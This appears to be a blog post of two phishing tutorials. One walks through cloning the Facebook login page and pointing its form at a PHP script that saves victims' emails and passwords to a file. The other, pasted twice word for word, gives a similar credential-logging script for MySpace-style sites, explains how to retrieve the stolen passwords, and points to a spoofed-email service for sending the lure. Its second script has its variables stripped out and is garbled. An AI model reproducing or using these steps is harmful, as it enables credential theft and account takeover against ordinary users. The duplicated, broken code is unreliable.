1. Open Facebook login page
(make sure that the page is loaded
completely) and right click and
select view source or view source
code option to see the source
code of the loaded login page.
2. Select all ( CTR + A ) and copy
all the code and paste it in
notepad.
3. Then search(CTR + F) for the
keyword action.You can see the
code as given below.
action=" https://
www.facebook.com/login.php?
login_attempt=1 "
4. Just change the above code as
mentioned below
action="pass.php"
after changing to pass.php (or
anyname.php) just save it in the
form facebook.html or
(anyname.html). By finishing this
step our phishing page is
ready.Now we want to create script
page for this phishing page.
5. For creating a php script,just
copy the below php code into
notepad and save in the format
pass.php (name mentioned in
action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[e
mail]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\" http://
www.facebook.com \">
</FRAMESET>";
?>
Note:‘ http://www.facebook.com ‘
is the redirection url,When victim
will enter his/her email and
password he will redirected
to’ http://www.facebook.com ‘
6. By this step our PHP script is
also ready,
7. Now host these 2 files
facebook.html
pass.php
in any of free hosting servers like
ripway, drivehq ,110
mb ,000webhost.com, t35.com etc
(or any other,you can just google
the term "free hosting" ). Make
sure that these 2 files are in same
directory.
8. After hosting you will get a
direct link to your phishing
page,that is to your facebook html
page , then just use this link to
access or send phishing page.
9. When anyone tries to login
through your phishing page a new
html page with name
password.html will be
automatically created in your
hosting directory with the
password and username entered
there.
10. Thus....you can own that
person's Fb account
[How To]Phishing Tutorial
-
Disclaimer::
This tutorial is for educational
purposes, whatever anyone does with
it is of no concern of mine.
The "passwords.txt" Link is only for
show to show what it will look like =]
-
::Get the pages Source Code::
First you should goto the site you
want to phish, and goto a login page,
make sure you are logged out to get
onto the logon page. Press "View >
Source", Copy and Paste what you
get into a blank NotePad File, Save it
as "Login.htm"
::Making the Phish File::
Open a new NotePad File and Paste
the following Code into it
Code:
<?php
header ('Location: http://myspace.com ');
= fopen("passwords.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
Change the "http://myspace.com" to
the site you are phishing.
Save the file as "phish.php"
Go back to your login.htm file and
click edit. Press CTRL+F and type in
action= in the box. Keep pressing
find until you find something that
says action=(something that has to
do with logging in). Replace that with
phish.php. You have a phisher =].
::How to access the passwords::
To access the details of your victims
you need to enter the domain that the
hosting service give you and put
"passwords.txt" at the end of it.
For Example. I would type in: http://
freegametime.byethost4.com/
passwords.txt
::Helpful Links::
mmoMailer.com - Ready, Set, Scam!
- This allows you to send fake
emails from fake email addresses
and send your phishing site out.
http://bytehost.com/ - This is a
pretty good hosting site without ads
and they offer you a free .co.cc
domain name when you are signing
up for free hosting =].
Any Questions just ask =]a
-
Disclaimer::
This tutorial is for educational
purposes, whatever anyone does with
it is of no concern of mine.
The "passwords.txt" Link is only for
show to show what it will look like =]
-
::Get the pages Source Code::
First you should goto the site you
want to phish, and goto a login page,
make sure you are logged out to get
onto the logon page. Press "View >
Source", Copy and Paste what you
get into a blank NotePad File, Save it
as "Login.htm"
::Making the Phish File::
Open a new NotePad File and Paste
the following Code into it
Code:
<?php
header ('Location: http://myspace.com ');
= fopen("passwords.txt", "a");
foreach(Array as => ) {
fwrite(, );
fwrite(, "=");
fwrite(, );
fwrite(, "rn");
}
fwrite(, "rn");
Change the "http://myspace.com" to
the site you are phishing.
Save the file as "phish.php"
Go back to your login.htm file and
click edit. Press CTRL+F and type in
action= in the box. Keep pressing
find until you find something that
says action=(something that has to
do with logging in). Replace that with
phish.php. You have a phisher =].
::How to access the passwords::
To access the details of your victims
you need to enter the domain that the
hosting service give you and put
"passwords.txt" at the end of it.
For Example. I would type in: http://
freegametime.byethost4.com/
passwords.txt
::Helpful Links::
mmoMailer.com - Ready, Set, Scam!
- This allows you to send fake
emails from fake email addresses
and send your phishing site out.
http://bytehost.com/ - This is a
pretty good hosting site without ads
and they offer you a free .co.cc
domain name when you are signing
up for free hosting =].
Any Questions just ask =]a
No comments:
Post a Comment